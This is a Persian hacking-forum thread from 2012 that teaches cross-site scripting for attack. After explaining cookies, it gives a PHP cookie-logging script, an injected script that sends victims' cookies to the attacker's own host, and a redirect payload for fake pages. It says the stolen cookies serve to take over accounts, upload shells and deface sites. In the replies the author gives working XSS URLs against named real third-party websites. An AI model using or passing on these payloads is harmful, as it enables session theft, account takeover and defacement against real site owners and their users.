+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+---- انجمن: LEARNING HACKING (http://parsicoders.com/forumdisplay.php?fid=125)
+---- موضوع: اموزش XSS و کدهای ان (/showthread.php?tid=1603)
اموزش XSS و کدهای ان - Amin_Mansouri - 01-22-2012
درود
یک بار اقا امیر و یک بار پروین خانم درخواست اموزش XSS رو داشتن که من کم کم اموزش XSS رو تقدیم اعضای پارسی کدرز میکنم.
XSS چیست ؟
XSS یا همون CSS که مخفف کلمه Cross Site Scripting می باشد CSS هم مخفف کلمه Cascading Style Sheat هست.
معمولا در این نوح حملات کوکی سیستم طرف رو میزنیم هدایتش میکنیم به یه صفحه دیگه
حالا این کوکی چیست ؟
كوكي عبارت است از يك پيغام كه سرور به مرورگر ( Browser ) شما مي فرستد. مرورگر شما اين پيغام را در يك فايل متني ( Text ) ذخيره مي كند. پس از آن هر بار كه كه شما به آن سرور مراجعه مي كنيد ( يعني يك صفحه از وب سايتي را كه روي آن سرور قرار دارد باز مي كنيد. ) يا به عبارت ديگر هر بار كه مرورگر شما (مثلاً اينترنت اكسپلورر ) در خواست يك صفحه از آن سرور مي كند اين پيغام را به آن سرور باز مي گرداند.
هدف اصلي كوكي ها شناسايي كاربران است تا تنظيماتي را كه كاربر بنا بر سليقه خود دفعة قبل روي يك وب سايت مثلاً ياهو انجام داده اكنون هم بتواند صفحه را با همان تنظيمات دفعه قبل برايش باز كند. براي مثال فرض كنيد در Hotmail يك ايميل درست كرده ايد و اكنون بعد از چند روز دوباره وارد سايت Hotmail مي شويد تا با وارد كردن ID (يا شناسه ) و پسورد وارد ايميل خود شويد و مشاهده مي كنيد كه با باز شدن صفحه ID شما از قبل نوشته شده است يا حتي اگر از قبل اين امكان را ايجاد كرده باشيد پسورد شما هم وارد شده فقط كافيست اينتر را بزنيد و وارد ايميل خود شويد. و زمانيكه در گوگل زبان خود را انتخاب مي كنيد و دفعه بعد كه وارد گوگل مي شويد و زبان مورد نظر شما به طور اتوماتيك انتخاب شده است همه اين كارها و بسياري از كارهاي ديگر اينچنيني بوسيله كوكي ها انجام مي شود در حقيقت از طريق كوكي ها سرور وب صفحات را مطابق عادت و سليقه شما باز مي كند و به اين طريق در وقت و حوصله شما صرفه جويي مي شود
انواع کوکی ها:
کوکی هاي پایا – دائمی (presistent Cookies) :
این نوع کوکی ها به عنوان یک فایل بر روي کامپیوتر شما ذخیره می شوند و بعد از بستن
مرورگر اینترنتی شما پاك نخواهند شد و همچنان باقی می مانند. این کوکی ها قابلیت به روز شدن توسط سایت ایجاد کننده خود را دارند همچنین سایت اجازه دسترسی مستقیم به این کوکی ها رو نیز دارد حدود 80 درصد کوکی هاي مورد استفاده از این نوع هستند .
کوکی هاي موقت (Temporary Cookies) :
کوکی هایی هستند که بعد از بستن مرورگر اینترنتی شما و یا خروج از سایت استفاده کننده از کوکی پاك می شوند .
نوع دیگر کوکی هاي موقت کوکی هاي زمان دار هستند که زمانی براي کار دارند و بعد از آن اصطلاحا Expire می شوند و از کار می افتند ولی پاك نمی شوند و در صورت بازدید مجدد از سایت ممکن است به روز رسانی شوند و مجددا مورد استفاده قرار بگیرند .
کوکی هاي ناخوشایند (Unsatisfactory cookies) :
این کوکی ها اجازه دسترسی به اطلاعات خصوصی شما را براي استفاده دویاره بدون پرسیدن از شما دارند از این کوکی ها بیشتر در خرید
مورد استفاده قرار می گیرند. (SSL*) هاي اینترنتی و سایت امن
ادامه دارد ...
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-22-2012
خوب توضیحاتی دادیم در مورد این باگ بدم من به روش اسان همیشه مطالبم رو اموزش میدهم .
خوب باید باید بگیریم اول بفهمیم سایت باگ xss داره یا نداره !
یادتون باشه یاید مدیر سایت انلاین باشه مثلا توی نظرات یک وب سایت باگ xss داره وقتی کدمون رو تزریق میکنیم باید مدیر سایت صفحه رو باز کنه وقتی که باز کنه اون موقع کد ما اجرا میشه و میتونیم دستورات رو اجرا کنیم .
یادتون باشه وقتی مرورگر مدیر سایت صفحه ای که کدهای xss رو تزریق کردیم رو باز میکنه کدهای ما اجرا شده توجه کنید کدهاتون روی سیستم مدیر سایت یا کاربرقربانی اجرا میشه و ربطی به سرور نداره
وقتی کوکی رو بزنیم میتونیم یوزر و پسوورد طرف رو بزنیم و حتی شل اپلود کنیم و کلا دیفیس کنیم.
برای پیدا کردن سایت های که باگ xss دارن نیاز به درک یا اسکنر یا به صورت دستی تست کردن داریم .
من فعلا یک درک میزارم بعد درک های بیشتری قرار میدهیم.
درک xss
کد:
"search?q=" or "search.php?q=حالا یه تست xss میکنیم سایت زیر رو باز کنید .
http://www.lifepages.org/comm/search1.asp
در قسمت سرچ برای کشف اسیب پذیری xss در قسمت سرچ عبارت زیر رو تایپ کنید :
کد:
<script>alert("xss bug find by parsicoders")</script>روی تصویر زیر کلیک کنید تا بهتر متوجه بشید :
![[عکس: tzpz6jra8rg0m3n5nq_thumb.jpg]](http://up.vatandownload.com/viewer.php?file=tzpz6jra8rg0m3n5nq.jpg)
توجه کنید باید xss در کامنت یا جایی باشه که مدی سایت ببینه بعد از پیدا کردن تارگت میخواهیم کوکیش رو بزنیم چطوری کوکی رو بزنیم ؟
اول برید توی سایت x10hosting.com یه هاست فری برای خودتون درست کنید.
کد زیر رو داخل notepad وارد کنید و به اسم iran.php ذخیره کنید.
کد :
کد:
<?php
$cookie = $_GET['cookie'];
$log = fopen("parsicoders.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>بعد از ذخیره داخل هاست که اکانت ساختید اپلود کنید یا در هاست رایگان gigfa.com هم میشه
تازه وارد ها (فایل باید داخل پوشه Public_Html ) باشه
حالا کد زیر رو تزریق میکنیم
کد:
<script>document.location="http://www.siteshoma.com/iran.php?cookie=" + document.cookie;</script>حالا جای siteshoma.com ادرس سایت خودتون رو بدید اگر به فرض در قسمت نظرات همچین باگی باشه هر کاربری کلیک کرد نظرات رو ببینه از ادمین تا کاربرها همه کوکیهاشون در هاستتون کنار فایلی که اپلود کردید یه فایل به اسم parsicoders.log ایجاد میشه
اگر بخواهیم مدیر سایت یا کاربرانش رو به سایت دیگری هدایت کنیم به روش زیر عمل میکنیم (بدرد fake page ) هم میخوره
به کد زیر توجه کنید :
Redirect to www.parsicoders.com
کد:
<script>window.location="http://parsicoders.com/index.php";</script>RE: اموزش XSS و کدهای ان - parvin - 01-22-2012
ببخشيد وسط درس يه سئوال بپرسم؟بعدا جابجاش كنيد.
من اكونتيكس رو دانلود كردم و باهاش چند تا سايت رو اسكن كردم. يكيش باگ xss داره. تو بخش جستجوي سايت اين كد شما رو نوشتم ولي اين اررور رو نداد. چرا؟
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-22-2012
سایتو همینجا بزار تا بگم (لینک مربوط به باگ xss)
RE: اموزش XSS و کدهای ان - parvin - 01-22-2012
اين سايته
http://jjs.uestc.edu.cn
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-22-2012
خوب کدوم قسمتش باگ xss داره ؟
اخه اسکن کنم یه کم طول میکشه
RE: اموزش XSS و کدهای ان - parvin - 01-23-2012
اكونتيكس كه فقط اينو نوشته
This vulnerability affects /player.php.
نميدونم درسته يانه. وقتي روي باگ قرمز كليك ميكنم اين مياد. ولي من تو قسمت سرچ صفحه اصلي سايت كد شما رو دادم.
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-23-2012
این سایت که دادی یه عالمه باگ داره
xss هم
کد:
http://jjs.uestc.edu.cn/download.php?name=<script>alert("xss bug find by parsicoders")</script>واسه پلیرش هم این میشه
کد:
http://jjs.uestc.edu.cn:80/player.php?vid=<script>alert("xss bug find by parsicoders")</script>RE: اموزش XSS و کدهای ان - parvin - 01-23-2012
اين ادرس هايي كه دادي رو از كجا اوردي؟ اكونتيكس كه اين ها رو نميده يا ميده و من بلد نيستم؟
الان من اين ادرس ها رو باز ميكنم كه هيچ اتفاقي نميوفته.
چطوري ميشه با اين باگ يه تصوير دلخواه گذاشت بذاريم تو سايت
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-23-2012
اینجوری :
مرحله 1:
![[عکس: oahfeekbojj5lttzi2ea_thumb.jpg]](http://up.vatandownload.com/viewer.php?file=oahfeekbojj5lttzi2ea.jpg)
مرحله 2:
![[عکس: mr4lz4gqhbv0wohc5mxf_thumb.jpg]](http://up.vatandownload.com/viewer.php?file=mr4lz4gqhbv0wohc5mxf.jpg)